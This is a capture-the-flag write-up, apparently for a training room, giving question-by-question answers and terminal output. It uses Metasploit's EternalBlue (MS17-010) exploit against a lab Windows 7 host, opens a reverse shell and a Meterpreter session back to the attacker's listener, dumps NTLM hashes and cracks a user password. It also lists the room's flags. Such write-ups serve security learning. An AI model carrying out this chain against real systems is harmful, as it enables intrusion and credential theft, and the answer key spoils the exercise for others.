[Recon]

[*] Target: 10.10.37.131

[Question 1] How many ports are open with a port number under 1000 => 3

[Question 2] What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067) => ms17-010

    # nmap -sV --script=vuln -p-1000 10.10.37.131

        Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-07 01:47 EDT

        Nmap scan report for 10.10.37.131
        Host is up (0.22s latency).
        Not shown: 65526 closed tcp ports (reset)
        PORT      STATE SERVICE            VERSION
        135/tcp   open  msrpc              Microsoft Windows RPC
        139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
        445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
        3389/tcp  open  ssl/ms-wbt-server?
        |_ssl-ccs-injection: No reply from server (TIMEOUT)
        49152/tcp open  msrpc              Microsoft Windows RPC
        49153/tcp open  msrpc              Microsoft Windows RPC
        49154/tcp open  msrpc              Microsoft Windows RPC
        49158/tcp open  msrpc              Microsoft Windows RPC
        49160/tcp open  msrpc              Microsoft Windows RPC
        Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

        Host script results:
        |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
        |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
        | smb-vuln-ms17-010: 
        |   VULNERABLE:
        |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
        |     State: VULNERABLE
        |     IDs:  CVE:CVE-2017-0143
        |     Risk factor: HIGH
        |       A critical remote code execution vulnerability exists in Microsoft SMBv1
        |        servers (ms17-010).
        |           
        |     Disclosure date: 2017-03-14
        |     References:
        |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
        |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
        |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
        |_smb-vuln-ms10-054: false

        Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
        Nmap done: 1 IP address (1 host up) scanned in 512.36 seconds


************************************************************************************************************************************************************************************************************************************************************


[Gain Access]

[*] Target: 10.10.37.131

[Question 1] Find the exploitation code we will run against the machine. What is the full path of the code? => exploit/windows/smb/ms17_010_eternalblue

        msf6 > search ms17-010

        Matching Modules
        ================

        #  Name                                      Disclosure Date  Rank     Check  Description
        -  ----                                      ---------------  ----     -----  -----------
        0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
        1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
        2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
        3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
        4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

[Question 2] Show options and set the one required value. What is the name of this value? (All caps for submission) => RHOSTS

        msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

        Module options (exploit/windows/smb/ms17_010_eternalblue):

        Name           Current Setting  Required  Description
        ----           ---------------  --------  -----------
        RHOSTS         10.10.37.131     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
        RPORT          445              yes       The target port (TCP)
        SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 ta
                                                    rget machines.
        SMBPass                         no        (Optional) The password for the specified username
        SMBUser                         no        (Optional) The username to authenticate as
        VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                                    machines.
        VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


        Payload options (windows/x64/shell/reverse_tcp):

        Name      Current Setting  Required  Description
        ----      ---------------  --------  -----------
        EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
        LHOST     10.14.56.1       yes       The listen address (an interface may be specified)
        LPORT     4444             yes       The listen port


************************************************************************************************************************************************************************************************************************************************************


[Escalate]

[*] Target: 10.10.37.131

[Question 1] What is the name of the post module we can use to convert a shell to meterpreter shell in metasploit => post/multi/manage/shell_to_meterpreter

[Question 2] Select this (use MODULE_PATH). Show options, what option are we required to change? => SESSION
 
    msf6 exploit(windows/smb/ms17_010_eternalblue) > run

        [*] Started reverse TCP handler on 10.14.56.1:4444 
        [*] 10.10.37.131:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
        [+] 10.10.37.131:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
        [*] 10.10.37.131:445      - Scanned 1 of 1 hosts (100% complete)
        [+] 10.10.37.131:445 - The target is vulnerable.
        ...
        [*] Command shell session 1 opened (10.14.56.1:4444 -> 10.10.37.131:49173) at 2023-07-07 02:12:17 -0400
        [+] 10.10.37.131:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
        [+] 10.10.37.131:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
        [+] 10.10.37.131:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Shell Banner:
        Microsoft Windows [Version 6.1.7601]
        -----
                
        C:\Windows\system32>^Z
        Background session 1? [y/N]  y
        
    msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meter

            Matching Modules
            ================

            #  Name                                    Disclosure Date  Rank    Check  Description
            -  ----                                    ---------------  ----    -----  -----------
            0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade

    msf6 post(multi/manage/shell_to_meterpreter) > show options

        Module options (post/multi/manage/shell_to_meterpreter):

        Name     Current Setting  Required  Description
        ----     ---------------  --------  -----------
        HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
        LHOST    10.14.56.1       no        IP of host that will receive the connection from the payload (Will try to auto detect).
        LPORT    4433             yes       Port for payload to connect to.
        SESSION  1                yes       The session to run this module on

    msf6 post(multi/manage/shell_to_meterpreter) > run

        [*] Upgrading session ID: 1
        [*] Starting exploit/multi/handler
        [*] Started reverse TCP handler on 10.14.56.1:4433 
        [*] Post module execution completed
        [*] Sending stage (200774 bytes) to 10.10.37.131
        [*] Meterpreter session 2 opened (10.14.56.1:4433 -> 10.10.37.131:49183) at 2023-07-07 02:20:25 -0400
        [*] Stopping exploit/multi/handler

    msf6 post(multi/manage/shell_to_meterpreter) > sessions

        Active sessions
        ===============

        Id  Name  Type                     Information                                               Connection
        --  ----  ----                     -----------                                               ----------
        1         shell x64/windows        Shell Banner: Microsoft Windows [Version 6.1.7601] -----  10.14.56.1:4444 -> 10.10.37.131:49173 (10.10.37.131)
        2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC                              10.14.56.1:4433 -> 10.10.37.131:49183 (10.10.37.131)

        msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
        [*] Starting interaction with 2...

        meterpreter > 

    [Note] Migrate to this process using the 'migrate PROCESS_ID', list all of the processes running via the 'ps' command.


************************************************************************************************************************************************************************************************************************************************************


[Cracking]

[*] Target: 10.10.37.131

[Question 1] What is the name of the non-default user? => Jon

    meterpreter > hashdump

        Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
        Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

[Question 2] Copy this password hash to a file and research how to crack it. What is the cracked password? => alqfna22

    Using https://crackstation.net/ I found that ffb43f0de35be4d9917ac0cc8ad57f8d <=> alqfna22


************************************************************************************************************************************************************************************************************************************************************


[Find flags!]

[*] Target: 10.10.37.131

[Question 1] Flag1? This flag can be found at the system root. => flag{access_the_machine}

[Question 2] Flag2? This flag can be found at the location where passwords are stored within Windows. => flag{sam_database_elevated_access}

[Question 3] Flag3? This flag can be found in an excellent location to loot => flag{admin_documents_can_be_valuable}

    >>> C:\Users\Jon\Documents>dir C:\*flag* /S /B

        C:\flag1.txt
        C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk
        C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk
        C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk
        C:\Users\Jon\Documents\flag3.txt
        C:\Windows\System32\config\flag2.txt

    >>> C:\Users\Jon\Documents>type C:\flag1.txt

        flag{access_the_machine}

    >>> C:\Users\Jon\Documents>type C:\Windows\System32\config\flag2.txt

        flag{sam_database_elevated_access}

    >>> C:\Users\Jon\Documents>type C:\Users\Jon\Documents\flag3.txt

        flag{admin_documents_can_be_valuable}
